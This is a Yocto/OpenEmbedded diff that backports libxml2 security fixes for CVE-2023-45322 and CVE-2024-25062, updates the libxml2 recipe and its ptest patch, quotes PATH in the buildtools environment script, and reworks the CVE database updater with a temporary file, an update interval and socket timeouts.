diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-45322-2.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-45322-2.patch
new file mode 100644
index 0000000000..c7e9681e6a
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-45322-2.patch
@@ -0,0 +1,80 @@
1From d39f78069dff496ec865c73aa44d7110e429bce9 Mon Sep 17 00:00:00 2001
2From: Nick Wellnhofer <wellnhofer@aevum.de>
3Date: Wed, 23 Aug 2023 20:24:24 +0200
4Subject: [PATCH] tree: Fix copying of DTDs
5
6- Don't create multiple DTD nodes.
7- Fix UAF if malloc fails.
8- Skip DTD nodes if tree module is disabled.
9
10Fixes #583.
11
12CVE: CVE-2023-45322
13Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/d39f78069dff496ec865c73aa44d7110e429bce9]
14
15Signed-off-by: Peter Marko <peter.marko@siemens.com>
16Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
17---
18 tree.c | 31 ++++++++++++++++---------------
19 1 file changed, 16 insertions(+), 15 deletions(-)
20
21diff --git a/tree.c b/tree.c
22index 6c8a875b9..02c1b5791 100644
23--- a/tree.c
24+++ b/tree.c
25@@ -4471,29 +4471,28 @@ xmlNodePtr
26 xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
27 xmlNodePtr ret = NULL;
28 xmlNodePtr p = NULL,q;
29+ xmlDtdPtr newSubset = NULL;
30
31 while (node != NULL) {
32-#ifdef LIBXML_TREE_ENABLED
33 if (node->type == XML_DTD_NODE ) {
34- if (doc == NULL) {
35+#ifdef LIBXML_TREE_ENABLED
36+ if ((doc == NULL) || (doc->intSubset != NULL)) {
37 node = node->next;
38 continue;
39 }
40- if (doc->intSubset == NULL) {
41- q = (xmlNodePtr) xmlCopyDtd( (xmlDtdPtr) node );
42- if (q == NULL) goto error;
43- q->doc = doc;
44- q->parent = parent;
45- doc->intSubset = (xmlDtdPtr) q;
46- xmlAddChild(parent, q);
47- } else {
48- q = (xmlNodePtr) doc->intSubset;
49- xmlAddChild(parent, q);
50- }
51- } else
52+ q = (xmlNodePtr) xmlCopyDtd( (xmlDtdPtr) node );
53+ if (q == NULL) goto error;
54+ q->doc = doc;
55+ q->parent = parent;
56+ newSubset = (xmlDtdPtr) q;
57+#else
58+ node = node->next;
59+ continue;
60 #endif /* LIBXML_TREE_ENABLED */
61+ } else {
62 q = xmlStaticCopyNode(node, doc, parent, 1);
63- if (q == NULL) goto error;
64+ if (q == NULL) goto error;
65+ }
66 if (ret == NULL) {
67 q->prev = NULL;
68 ret = p = q;
69@@ -4505,6 +4504,8 @@ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
70 }
71 node = node->next;
72 }
73+ if (newSubset != NULL)
74+ doc->intSubset = newSubset;
75 return(ret);
76 error:
77 xmlFreeNodeList(ret);
78--
79GitLab
80
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2024-25062-pre1.patch b/meta/recipes-core/libxml/libxml2/CVE-2024-25062-pre1.patch
new file mode 100644
index 0000000000..31183399f8
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2024-25062-pre1.patch
@@ -0,0 +1,38 @@
1From 31c6ce3b63f8a494ad9e31ca65187a73d8ad3508 Mon Sep 17 00:00:00 2001
2From: Nick Wellnhofer <wellnhofer@aevum.de>
3Date: Mon, 9 Nov 2020 17:55:44 +0100
4Subject: [PATCH] Avoid call stack overflow with XML reader and recursive
5 XIncludes
6
7Don't process XIncludes in the result of another inclusion to avoid
8infinite recursion resulting in a call stack overflow.
9
10This is something the XInclude engine shouldn't allow but correct
11handling of intra-document includes would require major changes.
12
13Found by OSS-Fuzz.
14
15Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/31c6ce3b63f8a494ad9e31ca65187a73d8ad3508]
16CVE: CVE-2024-25062 #Dependency Patch
17Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
18---
19 xmlreader.c | 3 ++-
20 1 file changed, 2 insertions(+), 1 deletion(-)
21
22diff --git a/xmlreader.c b/xmlreader.c
23index 01adf74f4..72e40b032 100644
24--- a/xmlreader.c
25+++ b/xmlreader.c
26@@ -1585,7 +1585,8 @@ node_found:
27 /*
28 * Handle XInclude if asked for
29 */
30- if ((reader->xinclude) && (reader->node != NULL) &&
31+ if ((reader->xinclude) && (reader->in_xinclude == 0) &&
32+ (reader->node != NULL) &&
33 (reader->node->type == XML_ELEMENT_NODE) &&
34 (reader->node->ns != NULL) &&
35 ((xmlStrEqual(reader->node->ns->href, XINCLUDE_NS)) ||
36--
37GitLab
38
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2024-25062.patch b/meta/recipes-core/libxml/libxml2/CVE-2024-25062.patch
new file mode 100644
index 0000000000..5365d5546a
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2024-25062.patch
@@ -0,0 +1,33 @@
1From 2b0aac140d739905c7848a42efc60bfe783a39b7 Mon Sep 17 00:00:00 2001
2From: Nick Wellnhofer <wellnhofer@aevum.de>
3Date: Sat, 14 Oct 2023 22:45:54 +0200
4Subject: [PATCH] [CVE-2024-25062] xmlreader: Don't expand XIncludes when
5 backtracking
6
7Fixes a use-after-free if XML Reader if used with DTD validation and
8XInclude expansion.
9
10Fixes #604.
11
12Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/2b0aac140d739905c7848a42efc60bfe783a39b7]
13CVE: CVE-2024-25062
14Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
15---
16 xmlreader.c | 1 +
17 1 file changed, 1 insertion(+)
18
19diff --git a/xmlreader.c b/xmlreader.c
20index 979385a13..fefd68e0b 100644
21--- a/xmlreader.c
22+++ b/xmlreader.c
23@@ -1443,6 +1443,7 @@ node_found:
24 * Handle XInclude if asked for
25 */
26 if ((reader->xinclude) && (reader->in_xinclude == 0) &&
27+ (reader->state != XML_TEXTREADER_BACKTRACK) &&
28 (reader->node != NULL) &&
29 (reader->node->type == XML_ELEMENT_NODE) &&
30 (reader->node->ns != NULL) &&
31--
32GitLab
33
diff --git a/meta/recipes-core/libxml/libxml2/runtest.patch b/meta/recipes-core/libxml/libxml2/runtest.patch
index 0dbb353c0f..c7a90cd3dc 100644
--- a/meta/recipes-core/libxml/libxml2/runtest.patch
+++ b/meta/recipes-core/libxml/libxml2/runtest.patch
@@ -1,28 +1,33 @@
1Add 'install-ptest' rule. Print a standard result line for 1From 6172ccd1e74bc181f5298f19e240234e12876abe Mon Sep 17 00:00:00 2001
2each test. 2From: Tony Tascioglu <tony.tascioglu@windriver.com>
3Date: Tue, 11 May 2021 11:57:46 -0400
4Subject: [PATCH] Add 'install-ptest' rule.
5
6Print a standard result line for each test.
3 7
4Signed-off-by: Mihaela Sendrea <mihaela.sendrea@enea.com> 8Signed-off-by: Mihaela Sendrea <mihaela.sendrea@enea.com>
5Signed-off-by: Andrej Valek <andrej.valek@siemens.com> 9Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
6Upstream-Status: Backport 10Upstream-Status: Pending
7 11
8Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com> 12Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
13Signed-off-by: Tony Tascioglu <tony.tascioglu@windriver.com>
9--- 14---
10 Makefile.am | 9 ++++ 15 Makefile.am | 9 +++
11 runsuite.c | 1 + 16 runsuite.c | 1 +
12 runtest.c | 2 + 17 runtest.c | 2 +
13 runxmlconf.c | 1 + 18 runxmlconf.c | 1 +
14 testapi.c | 122 ++++++++++++++++++++++++++++++--------------- 19 testapi.c | 122 ++++++++++++++++++++++++++-------------
15 testchar.c | 156 +++++++++++++++++++++++++++++++++++++++++----------------- 20 testchar.c | 156 +++++++++++++++++++++++++++++++++++---------------
16 testdict.c | 1 + 21 testdict.c | 1 +
17 testlimits.c | 1 + 22 testlimits.c | 1 +
18 testrecurse.c | 2 + 23 testrecurse.c | 2 +
19 9 files changed, 210 insertions(+), 85 deletions(-) 24 9 files changed, 210 insertions(+), 85 deletions(-)
20 25
21diff --git a/Makefile.am b/Makefile.am 26diff --git a/Makefile.am b/Makefile.am
22index 9c630be..7cfd04b 100644 27index 05d1671f..ae622745 100644
23--- a/Makefile.am 28--- a/Makefile.am
24+++ b/Makefile.am 29+++ b/Makefile.am
25@@ -202,6 +202,15 @@ runxmlconf_LDADD= $(LDADDS) 30@@ -198,6 +198,15 @@ runxmlconf_LDADD= $(LDADDS)
26 #testOOM_DEPENDENCIES = $(DEPS) 31 #testOOM_DEPENDENCIES = $(DEPS)
27 #testOOM_LDADD= $(LDADDS) 32 #testOOM_LDADD= $(LDADDS)
28 33
@@ -39,10 +44,10 @@ index 9c630be..7cfd04b 100644
39 testchar$(EXEEXT) testdict$(EXEEXT) runxmlconf$(EXEEXT) 44 testchar$(EXEEXT) testdict$(EXEEXT) runxmlconf$(EXEEXT)
40 [ -d test ] || $(LN_S) $(srcdir)/test . 45 [ -d test ] || $(LN_S) $(srcdir)/test .
41diff --git a/runsuite.c b/runsuite.c 46diff --git a/runsuite.c b/runsuite.c
42index aaab13e..9ba2c5d 100644 47index d24b5ec3..f7ff2521 100644
43--- a/runsuite.c 48--- a/runsuite.c
44+++ b/runsuite.c 49+++ b/runsuite.c
45@@ -1162,6 +1162,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) { 50@@ -1147,6 +1147,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
46 51
47 if (logfile != NULL) 52 if (logfile != NULL)
48 fclose(logfile); 53 fclose(logfile);
@@ -51,10 +56,10 @@ index aaab13e..9ba2c5d 100644
51 } 56 }
52 #else /* !SCHEMAS */ 57 #else /* !SCHEMAS */
53diff --git a/runtest.c b/runtest.c 58diff --git a/runtest.c b/runtest.c
54index addda5c..8ba5d59 100644 59index ffa98d04..470f95cb 100644
55--- a/runtest.c 60--- a/runtest.c
56+++ b/runtest.c 61+++ b/runtest.c
57@@ -4501,6 +4501,7 @@ launchTests(testDescPtr tst) { 62@@ -4508,6 +4508,7 @@ launchTests(testDescPtr tst) {
58 xmlCharEncCloseFunc(ebcdicHandler); 63 xmlCharEncCloseFunc(ebcdicHandler);
59 xmlCharEncCloseFunc(eucJpHandler); 64 xmlCharEncCloseFunc(eucJpHandler);
60 65
@@ -62,7 +67,7 @@ index addda5c..8ba5d59 100644
62 return(err); 67 return(err);
63 } 68 }
64 69
65@@ -4577,6 +4578,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) { 70@@ -4588,6 +4589,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
66 xmlCleanupParser(); 71 xmlCleanupParser();
67 xmlMemoryDump(); 72 xmlMemoryDump();
68 73
@@ -71,7 +76,7 @@ index addda5c..8ba5d59 100644
71 } 76 }
72 77
73diff --git a/runxmlconf.c b/runxmlconf.c 78diff --git a/runxmlconf.c b/runxmlconf.c
74index cef20f4..4f291fb 100644 79index 70f61017..e882b3a1 100644
75--- a/runxmlconf.c 80--- a/runxmlconf.c
76+++ b/runxmlconf.c 81+++ b/runxmlconf.c
77@@ -595,6 +595,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) { 82@@ -595,6 +595,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
@@ -83,7 +88,7 @@ index cef20f4..4f291fb 100644
83 } 88 }
84 89
85diff --git a/testapi.c b/testapi.c 90diff --git a/testapi.c b/testapi.c
86index 4a751e2..7ccc066 100644 91index ff8b470d..52b51d78 100644
87--- a/testapi.c 92--- a/testapi.c
88+++ b/testapi.c 93+++ b/testapi.c
89@@ -1246,49 +1246,91 @@ static int 94@@ -1246,49 +1246,91 @@ static int
@@ -219,7 +224,7 @@ index 4a751e2..7ccc066 100644
219 } 224 }
220 225
221diff --git a/testchar.c b/testchar.c 226diff --git a/testchar.c b/testchar.c
222index 0d08792..f555d3b 100644 227index 6866a175..7bce0132 100644
223--- a/testchar.c 228--- a/testchar.c
224+++ b/testchar.c 229+++ b/testchar.c
225@@ -23,7 +23,7 @@ static void errorHandler(void *unused, xmlErrorPtr err) { 230@@ -23,7 +23,7 @@ static void errorHandler(void *unused, xmlErrorPtr err) {
@@ -797,7 +802,7 @@ index 0d08792..f555d3b 100644
797 /* 802 /*
798 * Cleanup function for the XML library. 803 * Cleanup function for the XML library.
799diff --git a/testdict.c b/testdict.c 804diff --git a/testdict.c b/testdict.c
800index 40bebd0..114b934 100644 805index 40bebd05..114b9347 100644
801--- a/testdict.c 806--- a/testdict.c
802+++ b/testdict.c 807+++ b/testdict.c
803@@ -440,5 +440,6 @@ int main(void) 808@@ -440,5 +440,6 @@ int main(void)
@@ -808,7 +813,7 @@ index 40bebd0..114b934 100644
808 return(ret); 813 return(ret);
809 } 814 }
810diff --git a/testlimits.c b/testlimits.c 815diff --git a/testlimits.c b/testlimits.c
811index 68c94db..1584434 100644 816index 059116a6..f0bee68d 100644
812--- a/testlimits.c 817--- a/testlimits.c
813+++ b/testlimits.c 818+++ b/testlimits.c
814@@ -1634,5 +1634,6 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) { 819@@ -1634,5 +1634,6 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
@@ -819,7 +824,7 @@ index 68c94db..1584434 100644
819 return(ret); 824 return(ret);
820 } 825 }
821diff --git a/testrecurse.c b/testrecurse.c 826diff --git a/testrecurse.c b/testrecurse.c
822index f95ae1c..74c8f8b 100644 827index 0cbe25a6..3ecadb40 100644
823--- a/testrecurse.c 828--- a/testrecurse.c
824+++ b/testrecurse.c 829+++ b/testrecurse.c
825@@ -892,6 +892,7 @@ launchTests(testDescPtr tst) { 830@@ -892,6 +892,7 @@ launchTests(testDescPtr tst) {
@@ -838,5 +843,5 @@ index f95ae1c..74c8f8b 100644
838 return(ret); 843 return(ret);
839 } 844 }
840-- 845--
8412.7.4 8462.25.1
842 847
diff --git a/meta/recipes-core/libxml/libxml2_2.9.10.bb b/meta/recipes-core/libxml/libxml2_2.9.10.bb
index 4ebfb9e556..72f830b6d3 100644
--- a/meta/recipes-core/libxml/libxml2_2.9.10.bb
+++ b/meta/recipes-core/libxml/libxml2_2.9.10.bb
@@ -1,6 +1,6 @@
1SUMMARY = "XML C Parser Library and Toolkit" 1SUMMARY = "XML C Parser Library and Toolkit"
2DESCRIPTION = "The XML Parser Library allows for manipulation of XML files. Libxml2 exports Push and Pull type parser interfaces for both XML and HTML. It can do DTD validation at parse time, on a parsed document instance or with an arbitrary DTD. Libxml2 includes complete XPath, XPointer and Xinclude implementations. It also has a SAX like interface, which is designed to be compatible with Expat." 2DESCRIPTION = "The XML Parser Library allows for manipulation of XML files. Libxml2 exports Push and Pull type parser interfaces for both XML and HTML. It can do DTD validation at parse time, on a parsed document instance or with an arbitrary DTD. Libxml2 includes complete XPath, XPointer and Xinclude implementations. It also has a SAX like interface, which is designed to be compatible with Expat."
3HOMEPAGE = "http://www.xmlsoft.org/" 3HOMEPAGE = "https://gitlab.gnome.org/GNOME/libxml2"
4BUGTRACKER = "http://bugzilla.gnome.org/buglist.cgi?product=libxml2" 4BUGTRACKER = "http://bugzilla.gnome.org/buglist.cgi?product=libxml2"
5SECTION = "libs" 5SECTION = "libs"
6LICENSE = "MIT" 6LICENSE = "MIT"
@@ -11,8 +11,9 @@ LIC_FILES_CHKSUM = "file://Copyright;md5=2044417e2e5006b65a8b9067b683fcf1 \
11 11
12DEPENDS = "zlib virtual/libiconv" 12DEPENDS = "zlib virtual/libiconv"
13 13
14SRC_URI = "http://www.xmlsoft.org/sources/libxml2-${PV}.tar.gz;name=libtar \ 14inherit gnomebase
15 http://www.w3.org/XML/Test/xmlts20080827.tar.gz;subdir=${BP};name=testtar \ 15
16SRC_URI += "http://www.w3.org/XML/Test/xmlts20080827.tar.gz;subdir=${BP};name=testtar \
16 file://libxml-64bit.patch \ 17 file://libxml-64bit.patch \
17 file://runtest.patch \ 18 file://runtest.patch \
18 file://run-ptest \ 19 file://run-ptest \
@@ -23,10 +24,31 @@ SRC_URI = "http://www.xmlsoft.org/sources/libxml2-${PV}.tar.gz;name=libtar \
23 file://CVE-2020-7595.patch \ 24 file://CVE-2020-7595.patch \
24 file://CVE-2019-20388.patch \ 25 file://CVE-2019-20388.patch \
25 file://CVE-2020-24977.patch \ 26 file://CVE-2020-24977.patch \
27 file://CVE-2021-3517.patch \
28 file://CVE-2021-3537.patch \
29 file://CVE-2021-3518.patch \
30 file://CVE-2021-3541.patch \
31 file://CVE-2022-23308.patch \
32 file://CVE-2022-23308-fix-regression.patch \
33 file://CVE-2022-29824-dependent.patch \
34 file://CVE-2022-29824.patch \
35 file://0001-Port-gentest.py-to-Python-3.patch \
36 file://CVE-2016-3709.patch \
37 file://CVE-2022-40303.patch \
38 file://CVE-2022-40304.patch \
39 file://CVE-2023-28484.patch \
40 file://CVE-2023-29469.patch \
41 file://CVE-2023-39615-pre.patch \
42 file://CVE-2023-39615-0001.patch \
43 file://CVE-2023-39615-0002.patch \
44 file://CVE-2021-3516.patch \
45 file://CVE-2023-45322-1.patch \
46 file://CVE-2023-45322-2.patch \
47 file://CVE-2024-25062-pre1.patch \
48 file://CVE-2024-25062.patch \
26 " 49 "
27 50
28SRC_URI[libtar.md5sum] = "10942a1dc23137a8aa07f0639cbfece5" 51SRC_URI[archive.sha256sum] = "593b7b751dd18c2d6abcd0c4bcb29efc203d0b4373a6df98e3a455ea74ae2813"
29SRC_URI[libtar.sha256sum] = "aafee193ffb8fe0c82d4afef6ef91972cbaf5feea100edc2f262750611b4be1f"
30SRC_URI[testtar.md5sum] = "ae3d1ebe000a3972afa104ca7f0e1b4a" 52SRC_URI[testtar.md5sum] = "ae3d1ebe000a3972afa104ca7f0e1b4a"
31SRC_URI[testtar.sha256sum] = "96151685cec997e1f9f3387e3626d61e6284d4d6e66e0e440c209286c03e9cc7" 53SRC_URI[testtar.sha256sum] = "96151685cec997e1f9f3387e3626d61e6284d4d6e66e0e440c209286c03e9cc7"
32 54
@@ -40,9 +62,9 @@ PACKAGECONFIG[ipv6] = "--enable-ipv6,--disable-ipv6,"
40 62
41inherit autotools pkgconfig binconfig-disabled ptest features_check 63inherit autotools pkgconfig binconfig-disabled ptest features_check
42 64
43inherit ${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3native', '', d)} 65inherit ${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3targetconfig', '', d)}
44 66
45RDEPENDS_${PN}-ptest += "make ${@bb.utils.contains('PACKAGECONFIG', 'python', 'libgcc python3-core python3-logging python3-shell python3-stringold python3-threading python3-unittest ${PN}-python', '', d)}" 67RDEPENDS_${PN}-ptest += "bash make ${@bb.utils.contains('PACKAGECONFIG', 'python', 'libgcc python3-core python3-logging python3-shell python3-stringold python3-threading python3-unittest ${PN}-python', '', d)}"
46 68
47RDEPENDS_${PN}-python += "${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3-core', '', d)}" 69RDEPENDS_${PN}-python += "${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3-core', '', d)}"
48 70
@@ -81,6 +103,16 @@ do_configure_prepend () {
81} 103}
82 104
83do_compile_ptest() { 105do_compile_ptest() {
106 # Make sure that testapi.c is newer than gentests.py, because
107 # with reproducible builds, they will both get e.g. Jan 1 1970
108 # modification time from SOURCE_DATE_EPOCH and then check-am
109 # might try to rebuild_testapi, which will fail even with
110 # 0001-Port-gentest.py-to-Python-3.patch, because it needs
111 # libxml2 module (libxml2-native dependency and correctly
112 # set PYTHON_SITE_PACKAGES), it's easier to
113 # just rely on pre-generated testapi.c from the release
114 touch ${S}/testapi.c
115
84 oe_runmake check-am 116 oe_runmake check-am
85} 117}
86 118
diff --git a/meta/recipes-core/meta/buildtools-tarball.bb b/meta/recipes-core/meta/buildtools-tarball.bb
index faf7108a86..24f5f28589 100644
--- a/meta/recipes-core/meta/buildtools-tarball.bb
+++ b/meta/recipes-core/meta/buildtools-tarball.bb
@@ -66,7 +66,7 @@ create_sdk_files_append () {
66 # Generate new (mini) sdk-environment-setup file 66 # Generate new (mini) sdk-environment-setup file
67 script=${1:-${SDK_OUTPUT}/${SDKPATH}/environment-setup-${SDK_SYS}} 67 script=${1:-${SDK_OUTPUT}/${SDKPATH}/environment-setup-${SDK_SYS}}
68 touch $script 68 touch $script
69 echo 'export PATH=${SDKPATHNATIVE}${bindir_nativesdk}:${SDKPATHNATIVE}${sbindir_nativesdk}:${SDKPATHNATIVE}${base_bindir_nativesdk}:${SDKPATHNATIVE}${base_sbindir_nativesdk}:$PATH' >> $script 69 echo 'export PATH="${SDKPATHNATIVE}${bindir_nativesdk}:${SDKPATHNATIVE}${sbindir_nativesdk}:${SDKPATHNATIVE}${base_bindir_nativesdk}:${SDKPATHNATIVE}${base_sbindir_nativesdk}:$PATH"' >> $script
70 echo 'export OECORE_NATIVE_SYSROOT="${SDKPATHNATIVE}"' >> $script 70 echo 'export OECORE_NATIVE_SYSROOT="${SDKPATHNATIVE}"' >> $script
71 echo 'export GIT_SSL_CAINFO="${SDKPATHNATIVE}${sysconfdir}/ssl/certs/ca-certificates.crt"' >>$script 71 echo 'export GIT_SSL_CAINFO="${SDKPATHNATIVE}${sysconfdir}/ssl/certs/ca-certificates.crt"' >>$script
72 echo 'export SSL_CERT_FILE="${SDKPATHNATIVE}${sysconfdir}/ssl/certs/ca-certificates.crt"' >>$script 72 echo 'export SSL_CERT_FILE="${SDKPATHNATIVE}${sysconfdir}/ssl/certs/ca-certificates.crt"' >>$script
diff --git a/meta/recipes-core/meta/cve-update-db-native.bb b/meta/recipes-core/meta/cve-update-db-native.bb
index 9e8e006a32..efc32470d3 100644
--- a/meta/recipes-core/meta/cve-update-db-native.bb
+++ b/meta/recipes-core/meta/cve-update-db-native.bb
@@ -12,28 +12,76 @@ deltask do_compile
12deltask do_install 12deltask do_install
13deltask do_populate_sysroot 13deltask do_populate_sysroot
14 14
15# CVE database update interval, in seconds. By default: once a day (24*60*60).
16# Use 0 to force the update
17# Use a negative value to skip the update
18CVE_DB_UPDATE_INTERVAL ?= "86400"
19
20# Timeout for blocking socket operations, such as the connection attempt.
21CVE_SOCKET_TIMEOUT ?= "60"
22NVDCVE_URL ?= "https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-"
23
24CVE_DB_TEMP_FILE ?= "${CVE_CHECK_DB_DIR}/temp_nvdcve_1.1.db"
25
15python () { 26python () {
16 if not bb.data.inherits_class("cve-check", d): 27 if not bb.data.inherits_class("cve-check", d):
17 raise bb.parse.SkipRecipe("Skip recipe when cve-check class is not loaded.") 28 raise bb.parse.SkipRecipe("Skip recipe when cve-check class is not loaded.")
18} 29}
19 30
20python do_populate_cve_db() { 31python do_fetch() {
21 """ 32 """
22 Update NVD database with json data feed 33 Update NVD database with json data feed
23 """ 34 """
24 import bb.utils 35 import bb.utils
25 import bb.progress 36 import bb.progress
26 import sqlite3, urllib, urllib.parse, shutil, gzip 37 import shutil
27 from datetime import date
28 38
29 bb.utils.export_proxies(d) 39 bb.utils.export_proxies(d)
30 40
31 BASE_URL = "https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-"
32 YEAR_START = 2002
33
34 db_file = d.getVar("CVE_CHECK_DB_FILE") 41 db_file = d.getVar("CVE_CHECK_DB_FILE")
35 db_dir = os.path.dirname(db_file) 42 db_dir = os.path.dirname(db_file)
43 db_tmp_file = d.getVar("CVE_DB_TEMP_FILE")
44
45 cleanup_db_download(db_file, db_tmp_file)
46
47 # The NVD database changes once a day, so no need to update more frequently
48 # Allow the user to force-update
49 try:
50 import time
51 update_interval = int(d.getVar("CVE_DB_UPDATE_INTERVAL"))
52 if update_interval < 0:
53 bb.note("CVE database update skipped")
54 return
55 if time.time() - os.path.getmtime(db_file) < update_interval:
56 return
36 57
58 except OSError:
59 pass
60
61 bb.utils.mkdirhier(db_dir)
62 if os.path.exists(db_file):
63 shutil.copy2(db_file, db_tmp_file)
64
65 if update_db_file(db_tmp_file, d) == True:
66 # Update downloaded correctly, can swap files
67 shutil.move(db_tmp_file, db_file)
68 else:
69 # Update failed, do not modify the database
70 bb.note("CVE database update failed")
71 os.remove(db_tmp_file)
72}
73
74do_fetch[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}"
75do_fetch[file-checksums] = ""
76do_fetch[vardeps] = ""
77
78def cleanup_db_download(db_file, db_tmp_file):
79 """
80 Cleanup the download space from possible failed downloads
81 """
82
83 # Clean up the updates done on the main file
84 # Remove it only if a journal file exists - it means a complete re-download
37 if os.path.exists("{0}-journal".format(db_file)): 85 if os.path.exists("{0}-journal".format(db_file)):
38 # If a journal is present the last update might have been interrupted. In that case, 86 # If a journal is present the last update might have been interrupted. In that case,
39 # just wipe any leftovers and force the DB to be recreated. 87 # just wipe any leftovers and force the DB to be recreated.
@@ -42,37 +90,50 @@ python do_populate_cve_db() {
42 if os.path.exists(db_file): 90 if os.path.exists(db_file):
43 os.remove(db_file) 91 os.remove(db_file)
44 92
45 # Don't refresh the database more than once an hour 93 # Clean-up the temporary file downloads, we can remove both journal
46 try: 94 # and the temporary database
47 import time 95 if os.path.exists("{0}-journal".format(db_tmp_file)):
48 if time.time() - os.path.getmtime(db_file) < (60*60): 96 # If a journal is present the last update might have been interrupted. In that case,
49 return 97 # just wipe any leftovers and force the DB to be recreated.
50 except OSError: 98 os.remove("{0}-journal".format(db_tmp_file))
51 pass
52 99
53 bb.utils.mkdirhier(db_dir) 100 if os.path.exists(db_tmp_file):
101 os.remove(db_tmp_file)
54 102
55 # Connect to database 103def update_db_file(db_tmp_file, d):
56 conn = sqlite3.connect(db_file) 104 """
57 c = conn.cursor() 105 Update the given database file
106 """
107 import bb.utils, bb.progress
108 from datetime import date
109 import urllib, gzip, sqlite3
58 110
59 initialize_db(c) 111 YEAR_START = 2002
112 cve_socket_timeout = int(d.getVar("CVE_SOCKET_TIMEOUT"))
113
114 # Connect to database
115 conn = sqlite3.connect(db_tmp_file)
116 initialize_db(conn)
60 117
61 with bb.progress.ProgressHandler(d) as ph, open(os.path.join(d.getVar("TMPDIR"), 'cve_check'), 'a') as cve_f: 118 with bb.progress.ProgressHandler(d) as ph, open(os.path.join(d.getVar("TMPDIR"), 'cve_check'), 'a') as cve_f:
62 total_years = date.today().year + 1 - YEAR_START 119 total_years = date.today().year + 1 - YEAR_START
63 for i, year in enumerate(range(YEAR_START, date.today().year + 1)): 120 for i, year in enumerate(range(YEAR_START, date.today().year + 1)):
121 bb.debug(2, "Updating %d" % year)
64 ph.update((float(i + 1) / total_years) * 100) 122 ph.update((float(i + 1) / total_years) * 100)
65 year_url = BASE_URL + str(year) 123 year_url = (d.getVar('NVDCVE_URL')) + str(year)
66 meta_url = year_url + ".meta" 124 meta_url = year_url + ".meta"
67 json_url = year_url + ".json.gz" 125 json_url = year_url + ".json.gz"
68 126
69 # Retrieve meta last modified date 127 # Retrieve meta last modified date
70 try: 128 try:
71 response = urllib.request.urlopen(meta_url) 129 response = urllib.request.urlopen(meta_url, timeout=cve_socket_timeout)
72 except urllib.error.URLError as e: 130 except urllib.error.URLError as e:
73 cve_f.write('Warning: CVE db update error, Unable to fetch CVE data.\n\n') 131 cve_f.write('Warning: CVE db update error, Unable to fetch CVE data.\n\n')
74 bb.warn("Failed to fetch CVE data (%s)" % e.reason) 132 bb.warn("Failed to fetch CVE data (%s)" % e)
75 return 133 import socket
134 result = socket.getaddrinfo("nvd.nist.gov", 443, proto=socket.IPPROTO_TCP)
135 bb.warn("Host IPs are %s" % (", ".join(t[4][0] for t in result)))
136 return False
76 137
77 if response: 138 if response:
78 for l in response.read().decode("utf-8").splitlines(): 139 for l in response.read().decode("utf-8").splitlines():
@@ -82,64 +143,81 @@ python do_populate_cve_db() {
82 break 143 break
83 else: 144 else:
84 bb.warn("Cannot parse CVE metadata, update failed") 145 bb.warn("Cannot parse CVE metadata, update failed")
85 return 146 return False
86 147
87 # Compare with current db last modified date 148 # Compare with current db last modified date
88 c.execute("select DATE from META where YEAR = ?", (year,)) 149 cursor = conn.execute("select DATE from META where YEAR = ?", (year,))
89 meta = c.fetchone() 150 meta = cursor.fetchone()
151 cursor.close()
152
90 if not meta or meta[0] != last_modified: 153 if not meta or meta[0] != last_modified:
154 bb.debug(2, "Updating entries")
91 # Clear products table entries corresponding to current year 155 # Clear products table entries corresponding to current year
92 c.execute("delete from PRODUCTS where ID like ?", ('CVE-%d%%' % year,)) 156 conn.execute("delete from PRODUCTS where ID like ?", ('CVE-%d%%' % year,)).close()
93 157
94 # Update db with current year json file 158 # Update db with current year json file
95 try: 159 try:
96 response = urllib.request.urlopen(json_url) 160 response = urllib.request.urlopen(json_url, timeout=cve_socket_timeout)
97 if response: 161 if response:
98 update_db(c, gzip.decompress(response.read()).decode('utf-8')) 162 update_db(conn, gzip.decompress(response.read()).decode('utf-8'))
99 c.execute("insert or replace into META values (?, ?)", [year, last_modified]) 163 conn.execute("insert or replace into META values (?, ?)", [year, last_modified]).close()
100 except urllib.error.URLError as e: 164 except urllib.error.URLError as e:
101 cve_f.write('Warning: CVE db update error, CVE data is outdated.\n\n') 165 cve_f.write('Warning: CVE db update error, CVE data is outdated.\n\n')
102 bb.warn("Cannot parse CVE data (%s), update failed" % e.reason) 166 bb.warn("Cannot parse CVE data (%s), update failed" % e.reason)
103 return 167 return False
104 168 else:
169 bb.debug(2, "Already up to date (last modified %s)" % last_modified)
